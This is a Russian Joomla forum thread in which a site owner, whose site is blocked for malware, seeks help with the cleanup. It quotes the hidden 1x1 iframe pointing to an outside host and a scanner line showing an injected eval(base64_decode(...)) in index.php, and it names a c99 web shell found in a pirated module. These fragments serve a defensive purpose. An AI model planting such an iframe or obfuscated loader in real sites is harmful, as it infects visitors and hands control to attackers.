0 Пользователей и 1 Гость просматривают эту тему.
  • 9 Ответов
  • 5142 Просмотров
*

kik84

  • Завсегдатай
  • 1350
  • 64 / 4
Уезжал на месяц, не было возможности контролить сайт, по возвращении обнаружил, что по некоторым запросам он попал в топ 10 на первые места (в гугле). wtf? продвижением не занимался. но проблема в другом, через пару дней Chrome обнаружил вирус на сайте и заблокировал его. Google пишет, что возможно этот код <iframe src="http://lmhufaz.ftp1.biz/ip/stat.php" width=1 he
ight=1 style="visibility: hidden"> но найти эту строку через notepad+ не удается. онлайн сканеры ругаются
Спойлер
[свернуть]
, но понять, где искать не могу. вскоре и Яндекс заблокировал сайт, но в его разделе безопасность - 0 пользы, одна лирика.
поменял все пароли, запросил у хостера бэкап, установил JHackGuard и Eyesite. подскажите, что делать дальше (в бэкдорах ничего подозрительного не нашел)
« Последнее редактирование: 08.03.2013, 22:13:32 от kik84 »
*

Apple_Buy

  • Захожу иногда
  • 71
  • 1 / 0
  • Истина всегда рядом....
Re: Сайт заблокирован из-за вируса
« Ответ #1 : 09.11.2012, 01:13:36 »
Вам нужно для начала скачать весь сайт к себе на компьютер и прогнать его антивирусом, попробуйте Касперским он даже не пускает на ваш сайт (HEUR:Trojan.Script.Generic), скорее всего зараза засела в каком то java скрипте.
*

kik84

  • Завсегдатай
  • 1350
  • 64 / 4
Re: Сайт заблокирован из-за вируса
« Ответ #2 : 09.11.2012, 08:38:03 »
каспер ничего не нашел. в корень сайта залил еще одну утилиту для проверку шелов
вот отчет пример одной и десяток строк
/var/www/u2685724/data/www/dent-plus.ru/index.php
ONSE */ $JResp = JResponse::toString($mainframe->getCfg('gzip')); /*rrt*/ |eval(base64_decode("JHVybCAgICAgICA9ICdodHRwOi8vd29yZHByZXNzdGVzdDIuaW5mby8

надо теперь через phpadmin это удалять?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Сайт заблокирован из-за вируса
« Ответ #3 : 09.11.2012, 12:58:03 »
Замени этот index.php или
удали строку после 88 ,echo JResponse::toString($mainframe->getCfg('gzip'));
И смотри такой код в index.php шаблонов
п.с.
Проверяй бекдор
File: /var/www/u2685724/data/www/dent-plus.ru/modules/mod_blank15v53/tmpl/default.php
String:: c99
*

kik84

  • Завсегдатай
  • 1350
  • 64 / 4
Re: Сайт заблокирован из-за вируса
« Ответ #4 : 09.11.2012, 14:19:52 »
хостер дал вот этот скрипт еще.
есть такой пункт как "Директории, доступные скрипту на запись". указано, что подпапки libraries, includes, templates, editors? components и т.д открыты на запись и это не безопасно. а разве можно выставить на большинство папок в корне сайта атрибут 444? тогда ведь админка не будет корректно работать


[вложение удалено Администратором]
*

kik84

  • Завсегдатай
  • 1350
  • 64 / 4
Re: Сайт заблокирован из-за вируса
« Ответ #5 : 10.11.2012, 16:03:12 »
Замени этот index.php или
удали строку после 88 ,echo JResponse::toString($mainframe->getCfg('gzip'));
И смотри такой код в index.php шаблонов
п.с.
Проверяй бекдор
File: /var/www/u2685724/data/www/dent-plus.ru/modules/mod_blank15v53/tmpl/default.php
String:: c99

ок. сделал.
а есть какой-нибудь мануал по использованию fls?
Спойлер
[свернуть]
вроде бы ничего левого нет
*

sergoguga

  • Давно я тут
  • 896
  • 70 / 8
  • www.mpbox.ru
Re: Сайт заблокирован из-за вируса
« Ответ #6 : 10.11.2012, 16:09:53 »

Проверяй бекдор
File: /var/www/u2685724/data/www/dent-plus.ru/modules/mod_blank15v53/tmpl/default.php
String:: c99

ТС!! такой простой модуль и то умудрились скачать с варезника что-ли?)))
он же бесплатный))) http://extensions.joomla.org/extensions/core-enhancements/coding-a-scripts-integration/custom-code-in-modules/3668
>>> Верстка 100 евро - ждешь новый курс? Пиши!
>>> Создание моб. приложений по ГОСТу)))! Личка работает!
>>> Микроразметка по стандартам - цены адекват! Пиши, не боись!
>>> Личный кабинет на ZOO - уже сделан! Пиши в личку, не стесняйся!
*

kik84

  • Завсегдатай
  • 1350
  • 64 / 4
Re: Сайт заблокирован из-за вируса
« Ответ #7 : 10.11.2012, 16:25:15 »
ТС!! такой простой модуль и то умудрились скачать с варезника что-ли?)))
он же бесплатный))) http://extensions.joomla.org/extensions/core-enhancements/coding-a-scripts-integration/custom-code-in-modules/3668
это мой первый сайт на юмле, тогда качал не вникая откуда (facepalm), впоследствии оставил не более 10% загруженных компонентов
я думал, что если с админки модуль удалить, то он вообще больше нигде не сохраняется

т.е. вирусный код проник через mod_blank?
*

mrGreek

  • Новичок
  • 5
  • 0 / 0
Re: Сайт заблокирован из-за вируса
« Ответ #8 : 18.02.2013, 11:28:30 »
Может тут мне помогут?
Google не давал попасть на сайт, по причине вредоносного кода, после переливки всей Joomla сайт стал доступен и работает отлично.
Проблема осталась в панели администратора, вирус остался и в ней, только не могу определить где. Так же не работает меню в панели управления.
Тема уже создана тут http://joomlaforum.ru/index.php/topic,229934.msg1281219.html#msg1281219
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3155
Последний ответ 31.03.2024, 16:14:32
от SeBun
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 2263
Последний ответ 05.11.2021, 21:47:31
от wishlight
Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

Ответов: 0
Просмотров: 1139
Последний ответ 29.08.2020, 00:25:24
от cntrl
Безопасный вход на сайт Joomla и админка

Автор jm

Ответов: 9
Просмотров: 2288
Последний ответ 19.07.2020, 23:57:17
от wishlight
[Руководство] Как защитить сайт на версии 1.5 (не поддерживается разработчиками)

Автор flyingspook

Ответов: 13
Просмотров: 7864
Последний ответ 08.01.2020, 12:52:55
от winstrool